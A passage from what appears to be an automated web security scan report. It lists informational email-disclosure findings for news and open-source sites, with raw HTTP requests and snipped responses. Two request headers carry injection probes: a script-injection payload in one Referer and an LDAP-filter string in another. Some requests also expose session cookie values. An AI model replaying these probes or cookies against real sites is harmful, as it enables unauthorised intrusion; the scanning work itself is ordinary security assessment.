26.117. http://www.msnbc.redacted/id/41327694/ns/us_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41327694/ns/us_news/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41327694/ns/us_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.118. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41327817/ns/world_news-mideastn_africa/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41327817/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 181247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a class="share" href="mailto:name@address.com?subject=Share%20this%20interactive">
...[SNIP]...

26.119. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41327924/ns/world_news-europe/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41327924/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 181055

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...

26.120. http://www.msnbc.redacted/id/41328059/ns/us_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41328059/ns/us_news/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41328059/ns/us_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.121. http://www.msnbc.redacted/id/41328834/ns/world_news-europe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41328834/ns/world_news-europe/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41328834/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.122. http://www.msnbc.redacted/id/41329947/ns/us_news-crime_and_courts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41329947/ns/us_news-crime_and_courts/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41329947/ns/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.123. http://www.msnbc.redacted/id/41330515/ns/us_news-life/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41330515/ns/us_news-life/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41330515/ns/us_news-life/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.124. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41330876/ns/world_news-europe/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41330876/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.125. http://www.nasawatch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nasawatch.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

kcowing@spaceref.com
marc.boucher@spaceref.com
nasawatch@spaceref.com

Request

GET / HTTP/1.1
Host: www.nasawatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:12:31 GMT
Server: Apache/1.3.41 (Darwin) mod_ssl/2.8.31 OpenSSL/0.9.7l PHP/4.4.9 mod_perl/1.29
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 03:13:31 GMT
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 96832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="six
...[SNIP]...
<a href="mailto:nasawatch@spaceref.com">nasawatch@spaceref.com</a>
...[SNIP]...
<a href="mailto:nasawatch@spaceref.com">nasawatch@spaceref.com</a>
...[SNIP]...
<a href="mailto:kcowing@spaceref.com">
...[SNIP]...
<a href="mailto:marc.boucher@spaceref.com">
...[SNIP]...

26.126. http://www.newsvine.com/_vine/js/vs/master.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_vine/js/vs/master.xml

Issue detail

The following email addresses were disclosed in the response:

RichMJones@rcn.com
webmaster@newsvine.com

Request

GET /_vine/js/vs/master.xml?r=554227 HTTP/1.1
Host: www.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.newsvine.com/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296399959031

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:03:59 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sun, 30 Jan 2011 15:03:51 GMT
ETag: "12582b2-7d67f-49b119b69e3c0"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 15:03:59 GMT
Content-Type: text/xml
Content-Length: 513663

<?xml version="1.0" encoding="utf-8" ?>
<Wrapper>
   <events>
       <ActionRecord>
           <date>1296399241000</date>
           <action><![CDATA[Comment Vote]]></action>
           <subHeadline><![CDATA[]]></subHeadline>
           <s
...[SNIP]...
<![CDATA[RichMJones@rcn.com]]>
...[SNIP]...
<![CDATA[webmaster@newsvine.com]]>
...[SNIP]...
<![CDATA[webmaster@newsvine.com]]>
...[SNIP]...

26.127. https://www.newsvine.com/_vine/js/msnbc/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_vine/js/msnbc/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /_vine/js/msnbc/s_code.js?v=23247 HTTP/1.1
Host: www.newsvine.com
Connection: keep-alive
Referer: https://www.newsvine.com/_nv/accounts/login?aede4%22%3E%3Cscript%3Ealert(1)%3C/script%3E23d43ff5841=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=737406501fadd3f45b7f4acf77a8cd72

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:59:40 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 16 Nov 2010 18:37:08 GMT
ETag: "834a5e-448e-4952fd8137d00"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 16:59:40 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=3, max=996
Connection: Keep-Alive
Content-Type: text/javascript
Content-Length: 17550

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

26.128. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.129. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.130. http://www.polls.newsvine.com/_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js

Issue detail

The following email address was disclosed in the response:

yourname@email.com

Request

GET /_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:58:08 GMT
ETag: "d1f753-322e-49af283a16c00"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 01:17:40 GMT
Date: Sun, 30 Jan 2011 01:17:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 12846

/*v23247: 2011-01-28T17:58:08*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
